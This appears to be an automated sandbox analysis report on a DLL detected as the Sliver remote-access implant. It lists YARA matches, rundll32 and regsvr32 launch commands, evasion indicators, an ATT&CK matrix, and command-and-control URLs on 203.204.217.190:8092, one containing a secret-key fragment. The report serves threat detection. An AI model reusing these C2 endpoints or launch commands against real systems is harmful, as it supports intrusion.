            Source: Process Memory Space: rundll32.exe PID: 7488, type: MEMORYSTR | Matched rule: Multi_Trojan_Bishopsliver_42298c4a reference_sample = 3b45aae401ac64c055982b5f3782a3c4c892bdb9f9a5531657d50c27497c8007, os = multi, severity = x86, creation_date = 2021-10-20, scan_context = file, memory, license = Elastic License v2, threat_name = Multi.Trojan.Bishopsliver, fingerprint = 0734b090ea10abedef4d9ed48d45c834dd5cf8e424886a5be98e484f69c5e12a, id = 42298c4a-fcea-4c5a-b213-32db00e4eb5a, last_modified = 2022-01-14
            Source: Process Memory Space: rundll32.exe PID: 7624, type: MEMORYSTR | Matched rule: Multi_Trojan_Bishopsliver_42298c4a reference_sample = 3b45aae401ac64c055982b5f3782a3c4c892bdb9f9a5531657d50c27497c8007, os = multi, severity = x86, creation_date = 2021-10-20, scan_context = file, memory, license = Elastic License v2, threat_name = Multi.Trojan.Bishopsliver, fingerprint = 0734b090ea10abedef4d9ed48d45c834dd5cf8e424886a5be98e484f69c5e12a, id = 42298c4a-fcea-4c5a-b213-32db00e4eb5a, last_modified = 2022-01-14
            Source: Process Memory Space: rundll32.exe PID: 7664, type: MEMORYSTR | Matched rule: Multi_Trojan_Bishopsliver_42298c4a reference_sample = 3b45aae401ac64c055982b5f3782a3c4c892bdb9f9a5531657d50c27497c8007, os = multi, severity = x86, creation_date = 2021-10-20, scan_context = file, memory, license = Elastic License v2, threat_name = Multi.Trojan.Bishopsliver, fingerprint = 0734b090ea10abedef4d9ed48d45c834dd5cf8e424886a5be98e484f69c5e12a, id = 42298c4a-fcea-4c5a-b213-32db00e4eb5a, last_modified = 2022-01-14
            Source: classification engine | Classification label: mal96.troj.evad.winDLL@14/0@0/1
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7352:120:WilError_03
            Source: 5cPRapVOx6.dll | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Windows\System32\loaddll32.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\5cPRapVOx6.dll",#1
            Source: 5cPRapVOx6.dll | ReversingLabs: Detection: 50%
            Source: unknown | Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\5cPRapVOx6.dll"
            Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\5cPRapVOx6.dll",#1
            Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /i /s C:\Users\user\Desktop\5cPRapVOx6.dll
            Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\5cPRapVOx6.dll,DllInstall
            Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\5cPRapVOx6.dll,DllRegisterServer
            Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\5cPRapVOx6.dll,DllUnregisterServer
            Source: C:\Windows\System32\loaddll32.exe | Section loaded: apphelp.dll
            Source: C:\Windows\System32\loaddll32.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\System32\loaddll32.exe | Section loaded: winmm.dll
            Source: C:\Windows\System32\loaddll32.exe | Section loaded: powrprof.dll
            Source: C:\Windows\System32\loaddll32.exe | Section loaded: umpdc.dll
            Source: C:\Windows\System32\loaddll32.exe | Section loaded: winhttp.dll
            Source: C:\Windows\System32\loaddll32.exe | Section loaded: mswsock.dll
            Source: C:\Windows\System32\loaddll32.exe | Section loaded: iphlpapi.dll
            Source: C:\Windows\System32\loaddll32.exe | Section loaded: dhcpcsvc6.dll
            Source: C:\Windows\System32\loaddll32.exe | Section loaded: dhcpcsvc.dll
            Source: C:\Windows\System32\loaddll32.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\System32\loaddll32.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\System32\loaddll32.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\System32\loaddll32.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: apphelp.dll
            Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: apphelp.dll
            Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: aclayers.dll
            Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: mpr.dll
            Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: sfc.dll
            Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: sfc_os.dll
            Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: winmm.dll
            Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: powrprof.dll
            Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: umpdc.dll
            Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: mswsock.dll
            Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: dhcpcsvc6.dll
            Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: dhcpcsvc.dll
            Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: ondemandconnroutehelper.dll
            Source: 5cPRapVOx6.dll | Static PE information: Virtual size of .text is bigger than: 0x100000
            Source: 5cPRapVOx6.dll | Static PE information: Image base 0x68340000 > 0x60000000
            Source: 5cPRapVOx6.dll | Static file information: File size 16616960 > 1048576
            Source: 5cPRapVOx6.dll | Static PE information: Raw size of .text is bigger than: 0x100000 < 0x9db200
            Source: 5cPRapVOx6.dll | Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x571e00
            Source: 5cPRapVOx6.dll | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
            Source: 5cPRapVOx6.dll | Static PE information: section name: .eh_fram
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_0CC80A18 push 3E6CDD5Dh; retn 0000h | 6_2_0CC80A1D
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0C838618 pushfd ; ret | 7_2_0C83861A
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0C880194 pushfd ; ret | 7_2_0C88019A
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_0CC30E51 push cs; ret | 8_2_0CC30E52

            Hooking and other Techniques for Hiding and Protection

            Source: unknown | Network traffic detected: HTTP traffic on port 8092 -> 49743
            Source: unknown | Network traffic detected: HTTP traffic on port 49746 -> 8092
            Source: unknown | Network traffic detected: HTTP traffic on port 8092 -> 49745
            Source: unknown | Network traffic detected: HTTP traffic on port 8092 -> 49744
            Source: unknown | Network traffic detected: HTTP traffic on port 49747 -> 8092
            Source: unknown | Network traffic detected: HTTP traffic on port 49748 -> 8092
            Source: unknown | Network traffic detected: HTTP traffic on port 8092 -> 49746
            Source: unknown | Network traffic detected: HTTP traffic on port 8092 -> 49747
            Source: unknown | Network traffic detected: HTTP traffic on port 8092 -> 49748
            Source: unknown | Network traffic detected: HTTP traffic on port 8092 -> 49749
            Source: unknown | Network traffic detected: HTTP traffic on port 49750 -> 8092
            Source: unknown | Network traffic detected: HTTP traffic on port 8092 -> 49750
            Source: unknown | Network traffic detected: HTTP traffic on port 8092 -> 49751
            Source: unknown | Network traffic detected: HTTP traffic on port 49752 -> 8092
            Source: unknown | Network traffic detected: HTTP traffic on port 8092 -> 49752
            Source: unknown | Network traffic detected: HTTP traffic on port 8092 -> 49753
            Source: unknown | Network traffic detected: HTTP traffic on port 49754 -> 8092
            Source: unknown | Network traffic detected: HTTP traffic on port 8092 -> 49754
            Source: unknown | Network traffic detected: HTTP traffic on port 8092 -> 49761
            Source: unknown | Network traffic detected: HTTP traffic on port 49763 -> 8092
            Source: unknown | Network traffic detected: HTTP traffic on port 8092 -> 49762
            Source: unknown | Network traffic detected: HTTP traffic on port 49764 -> 8092
            Source: unknown | Network traffic detected: HTTP traffic on port 8092 -> 49763
            Source: unknown | Network traffic detected: HTTP traffic on port 8092 -> 49764
            Source: unknown | Network traffic detected: HTTP traffic on port 8092 -> 49765
            Source: unknown | Network traffic detected: HTTP traffic on port 49767 -> 8092
            Source: unknown | Network traffic detected: HTTP traffic on port 8092 -> 49767
            Source: unknown | Network traffic detected: HTTP traffic on port 8092 -> 49766
            Source: unknown | Network traffic detected: HTTP traffic on port 49768 -> 8092
            Source: unknown | Network traffic detected: HTTP traffic on port 8092 -> 49768
            Source: unknown | Network traffic detected: HTTP traffic on port 8092 -> 49769
            Source: unknown | Network traffic detected: HTTP traffic on port 49770 -> 8092
            Source: unknown | Network traffic detected: HTTP traffic on port 8092 -> 49770
            Source: unknown | Network traffic detected: HTTP traffic on port 8092 -> 49771
            Source: unknown | Network traffic detected: HTTP traffic on port 49772 -> 8092
            Source: unknown | Network traffic detected: HTTP traffic on port 8092 -> 49772
            Source: C:\Windows\System32\loaddll32.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\System32\loaddll32.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\regsvr32.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\regsvr32.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5744 | Thread sleep time: -120000s >= -30000s
            Source: C:\Windows\SysWOW64\rundll32.exe TID: 5808 | Thread sleep time: -120000s >= -30000s
            Source: C:\Windows\SysWOW64\rundll32.exe TID: 8184 | Thread sleep time: -90000s >= -30000s
            Source: C:\Windows\SysWOW64\rundll32.exe TID: 4340 | Thread sleep time: -120000s >= -30000s
            Source: C:\Windows\SysWOW64\rundll32.exe TID: 6120 | Thread sleep time: -120000s >= -30000s
            Source: C:\Windows\System32\loaddll32.exe | System information queried: CurrentTimeZoneInformation
            Source: C:\Windows\SysWOW64\regsvr32.exe | System information queried: CurrentTimeZoneInformation
            Source: C:\Windows\SysWOW64\rundll32.exe | System information queried: CurrentTimeZoneInformation
            Source: C:\Windows\SysWOW64\rundll32.exe | System information queried: CurrentTimeZoneInformation
            Source: C:\Windows\SysWOW64\rundll32.exe | System information queried: CurrentTimeZoneInformation
            Source: C:\Windows\SysWOW64\rundll32.exe | System information queried: CurrentTimeZoneInformation
            Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
            Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
            Source: loaddll32.exe, 00000001.00000002.4209755047.0000000001145000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll(
            Source: rundll32.exe, 00000008.00000002.4210435396.000000000064A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllj
            Source: regsvr32.exe, 00000004.00000002.4209945473.0000000000B1A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll#
            Source: rundll32.exe, 00000005.00000002.4211265707.00000000007EA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4210958697.000000000099A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.4210351157.000000000059A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected

            HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 203.204.217.190 8092
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\5cPRapVOx6.dll",#1
Source: C:\Windows\SysWOW64\regsvr32.exe | Queries volume information: C:\Windows\SysWOW64\regsvr32.exe VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe | Queries volume information: C:\Windows\SysWOW64\rundll32.exe VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe | Queries volume information: C:\Windows\SysWOW64\rundll32.exe VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe | Queries volume information: C:\Windows\SysWOW64\rundll32.exe VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe | Queries volume information: C:\Windows\SysWOW64\rundll32.exe VolumeInformation

            Stealing of Sensitive Information

Source: Yara match | File source: 00000007.00000003.3672650809.000000000C95C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.4218098729.000000000CD74000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.4220285645.000000000C95C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.3996852512.000000000CD74000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.4218005900.000000000CCCA000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.3835816223.000000000CCCA000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.4218398121.000000000A114000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.4217009815.000000000CCD2000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000003.2663104353.000000000CCF6000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.4220443970.000000000CCF6000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000003.2589897810.000000000CCD2000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: loaddll32.exe PID: 7336, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: regsvr32.exe PID: 7472, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 7480, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 7488, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 7624, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 7664, type: MEMORYSTR

            Remote Access Functionality

Source: Yara match | File source: 00000007.00000003.3672650809.000000000C95C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.4218098729.000000000CD74000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.4220285645.000000000C95C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.3996852512.000000000CD74000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.4218005900.000000000CCCA000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.3835816223.000000000CCCA000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.4218398121.000000000A114000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.4217009815.000000000CCD2000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000003.2663104353.000000000CCF6000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.4220443970.000000000CCF6000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000003.2589897810.000000000CCD2000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: loaddll32.exe PID: 7336, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: regsvr32.exe PID: 7472, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 7480, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 7488, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 7624, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 7664, type: MEMORYSTR
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 1 DLL Side-Loading | 111 Process Injection | 1 Virtualization/Sandbox Evasion | OS Credential Dumping | 1 System Time Discovery | Remote Services | Data from Local System | 11 Non-Standard Port | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 111 Process Injection | LSASS Memory | 1 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 2 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 1 Obfuscated Files or Information | Security Account Manager | 1 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Regsvr32 | NTDS | 11 System Information Discovery | Distributed Component Object Model | Input Capture | 12 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Rundll32 | LSA Secrets | Internet Connection Discovery | SSH | Keylogging | 1 Proxy | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | Wi-Fi Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
Source | Detection | Scanner | Label | Link
5cPRapVOx6.dll | 50% | ReversingLabs | Win32.Trojan.SliverMarte |
5cPRapVOx6.dll | 100% | Joe Sandbox ML |  |
No Antivirus matches
No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
http://203.204.217.190:8092/db/namespaces/signin.html?rp=33556174&w=6871591h9 | true |  | unknown
http://203.204.217.190:8092/namespaces/db/oauth2callback/oauth2callback/db/api.html?c=68572884&oo=6708672y6 | true |  | unknown
http://203.204.217.190:8092/db/oauth/db/oauth2/php/db/oauth2callback/rpc.html?h=75352k715&wh=18f84w5628 | true |  | unknown
http://203.204.217.190:8092/oauth/oauth2/oauth2/api/oauth/php/oauth2callback/rpc.html?j=667332t1t6&yi=670f86726 | true |  | unknown
http://203.204.217.190:8092/oauth/api/php/db/sign-up.html?_u=3355617q4&u=4866k2066 | true |  | unknown
http://203.204.217.190:8092/database/namespaces/oauth2/oauth/database/rpc.html?bs=3q3556174&n=5l3348718 | true |  | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://203.204.217.190:8092/db/oauth/db/oauth2/php/db/oauth2callback/rpc.html | rundll32.exe, 00000008.00000003.2661683184.000000000CE46000.00000004.00001000.00020000.00000000.sdmp | false |  | unknown
https://203.204.217.190:8092urathttps://203.204.217.190:8092 | rundll32.exe, 00000006.00000002.4221106121.000000000CDC8000.00000004.00001000.00020000.00000000.sdmp | false |  | unknown
http://203.204.217.190:8092/namespaces/oauth/sign-up.html | rundll32.exe, 00000007.00000003.3671523760.000000000C9DC000.00000004.00001000.00020000.00000000.sdmp | false |  | unknown
https://203.204.217.190:8092B0 | rundll32.exe, 00000008.00000002.4210435396.000000000064A000.00000004.00000020.00020000.00000000.sdmp | false |  | unknown
http://203.204.217.190:8092/oauth/api/php/db/sign-up.phphttp://203.204.217.190:8092/oauth/api/php/db | rundll32.exe, 00000007.00000002.4214531173.000000000C88C000.00000004.00001000.00020000.00000000.sdmp | false |  | unknown
https://203.204.217.190:8092/db/oauth2callback/namespaces/login.html?AGE-SECRET-KEY-1M74AHG87SZUEJ8T | rundll32.exe, 00000006.00000003.2589751609.000000000CD26000.00000004.00001000.00020000.00000000.sdmp | false |  | unknown
http://203.204.217.190:8092/db/oauth/db/oauth2/php/db/oauth2callback/rpc.html? | rundll32.exe, 00000008.00000003.2661683184.000000000CE46000.00000004.00001000.00020000.00000000.sdmp | false |  | unknown
https://203.204.217.190:8092/oauth2callback/oauth2callback/sign-up.html?d=d74442283&la=63379h847 | rundll32.exe, 00000005.00000003.3834534105.000000000CDD6000.00000004.00001000.00020000.00000000.sdmp | false |  | unknown
http://203.204.217.190:8092/namespaces/db/oauth2callback/oauth2callback/db/api.html?c=68572884&oo=67 | regsvr32.exe, 00000004.00000003.3996435378.000000000CDFA000.00000004.00001000.00020000.00000000.sdmp | false |  | unknown
https://203.204.217.190:8092/database/database/db/database/login.html? | rundll32.exe, 00000008.00000002.4216262550.000000000CCA6000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.4214213422.000000000CC20000.00000004.00001000.00020000.00000000.sdmp | false |  | unknown
https://203.204.217.190:8092/register.html | loaddll32.exe, 00000001.00000003.3285571702.000000000A196000.00000004.00001000.00020000.00000000.sdmp, loaddll32.exe, 00000001.00000002.4220677081.000000000A198000.00000004.00001000.00020000.00000000.sdmp | false |  | unknown
http://203.204.217.190:8092/rpc.php | rundll32.exe, 00000006.00000003.2589897810.000000000CCFE000.00000004.00001000.00020000.00000000.sdmp | false |  | unknown
http://203.204.217.190:8092Upgrade-Insecure-Requestsh=75352k715&wh=18f84w5628 | rundll32.exe, 00000008.00000003.2661833618.000000000CE28000.00000004.00001000.00020000.00000000.sdmp | false |  | unknown
https://203.204.217.190:8092/db/oauth2callback/namespaces/login.html? | rundll32.exe, 00000006.00000002.4219849494.000000000CDAA000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2589121437.000000000CDAA000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2589751609.000000000CD26000.00000004.00001000.00020000.00000000.sdmp | false |  | unknown
http://203.204.217.190:8092/database/namespaces/oauth2/oauth/database/rpc.html? | loaddll32.exe, 00000001.00000002.4223019198.000000000A298000.00000004.00001000.00020000.00000000.sdmp | false |  | unknown
https://203.204.217.190:8092/api/namespaces/login.html? | loaddll32.exe, 00000001.00000002.4226594192.000000000A4A8000.00000004.00001000.00020000.00000000.sdmp | false |  | unknown
https://203.204.217.190:8092/register.php. | loaddll32.exe, 00000001.00000002.4220764521.000000000A19C000.00000004.00001000.00020000.00000000.sdmp, loaddll32.exe, 00000001.00000003.3285464830.000000000A19A000.00000004.00001000.00020000.00000000.sdmp | false |  | unknown
https://203.204.217.190:8092Content-Transfer-Encodinghttps://203.204.217.190:8092WinHttpGetDefaultPr | rundll32.exe, 00000008.00000002.4214213422.000000000CC1A000.00000004.00001000.00020000.00000000.sdmp | false |  | unknown
https://203.204.217.190:8092/api/namespaces/login.html?r=3772_4761&so=584673b09Mozilla/5.0 | loaddll32.exe, 00000001.00000002.4215361930.000000000A082000.00000004.00001000.00020000.00000000.sdmp | false |  | unknown
https://203.204.217.190:8092ab1c2d3e4f5g6h7j8k9m0npqrtuvwxyzf=4d9398139&qc=dl58467309https://203.204 | rundll32.exe, 00000006.00000002.4214808976.000000000CCA0000.00000004.00001000.00020000.00000000.sdmp | false |  | unknown
https://203.204.217.190:8092/api/namespaces/login.php | loaddll32.exe, 00000001.00000002.4226594192.000000000A4A8000.00000004.00001000.00020000.00000000.sdmp | false |  | unknown
http://203.204.217.190:8092http://203.204.217.190:8092WinHttpGetDefaultProxyConfigurati | rundll32.exe, 00000008.00000003.2661833618.000000000CE28000.00000004.00001000.00020000.00000000.sdmp | false |  | unknown
https://203.204.217.190:8092h | rundll32.exe, 00000005.00000002.4211265707.00000000007EA000.00000004.00000020.00020000.00000000.sdmp | false |  | unknown
https://203.204.217.190:8092/api/namespaces/login.html?r=3772_4761&so=584673b09 | loaddll32.exe, 00000001.00000002.4215361930.000000000A082000.00000004.00001000.00020000.00000000.sdmp | false |  | unknown
https://203.204.217.190:8092/api/oauth2callback/api/oauth2callback/database/database/php/api.html?ht | rundll32.exe, 00000005.00000002.4216612761.000000000CC98000.00000004.00001000.00020000.00000000.sdmp | false |  | unknown
https://203.204.217.190:8092/api/oauth/database/oauth/samples.php | regsvr32.exe, 00000004.00000003.3995842237.000000000CEBA000.00000004.00001000.00020000.00000000.sdmp | false |  | unknown
http://203.204.217.190:8092/oauth/api/php/db/sign-up.html? | rundll32.exe, 00000007.00000002.4214531173.000000000C88C000.00000004.00001000.00020000.00000000.sdmp | false |  | unknown
http://203.204.217.190:8092kG | rundll32.exe, 00000006.00000002.4211389999.00000000009CF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3917332777.00000000009CE000.00000004.00000020.00020000.00000000.sdmp | false |  | unknown
https://203.204.217.190:8092mtls://203.204.217.190:8082t | rundll32.exe, 00000007.00000003.3671523760.000000000C9CE000.00000004.00001000.00020000.00000000.sdmp | false |  | unknown
https://203.204.217.190:8092/database/php/php/database/register.html?AGE-SECRET-KEY-1M74AHG87SZUEJ8T | rundll32.exe, 00000007.00000003.3672973285.000000000C90E000.00000004.00001000.00020000.00000000.sdmp | false |  | unknown
http://203.204.217.190:8092/oauth/oauth2/oauth2/api/oauth/php/oauth2callback/rpc.phphttp://203.204.2 | rundll32.exe, 00000005.00000003.3835054805.000000000CD5C000.00000004.00001000.00020000.00000000.sdmp | false |  | unknown
https://f=4d9398139&qc=HTTP/1.1tno | rundll32.exe, 00000006.00000002.4217009815.000000000CD0A000.00000004.00001000.00020000.00000000.sdmp | false |  | unknown
https://203.204.217.190:8092/register.html?H | loaddll32.exe, 00000001.00000002.4220764521.000000000A19C000.00000004.00001000.00020000.00000000.sdmp, loaddll32.exe, 00000001.00000003.3285464830.000000000A19A000.00000004.00001000.00020000.00000000.sdmp | false |  | unknown
http://203.204.217.190:8092/oauth/api/php/db/sign-up.html?H | rundll32.exe, 00000007.00000002.4214531173.000000000C88C000.00000004.00001000.00020000.00000000.sdmp | false |  | unknown
https://203.204.217.190:8092/oauth2callback/db/oauth2/php/api.html? | regsvr32.exe, 00000004.00000002.4211857579.000000000CC20000.00000004.00001000.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.3997562902.000000000CD26000.00000004.00001000.00020000.00000000.sdmp | false |  | unknown
http://203.204.217.190:8092/rpc.htmlSetFileCompletionNotificationModesC: | rundll32.exe, 00000006.00000003.2589833273.000000000CD1A000.00000004.00001000.00020000.00000000.sdmp | false |  | unknown
https://203.204.217.190:8092/api/oauth2callback/api/oauth2callback/database/database/php/api.html | rundll32.exe, 00000005.00000002.4224807817.000000000CE86000.00000004.00001000.00020000.00000000.sdmp | false |  | unknown
http://203.204.217.190:8092/db/namespaces/signin.html?rp=33556174&w=6871591h9Mozilla/5.0 | rundll32.exe, 00000008.00000002.4214213422.000000000CC06000.00000004.00001000.00020000.00000000.sdmp | false |  | unknown
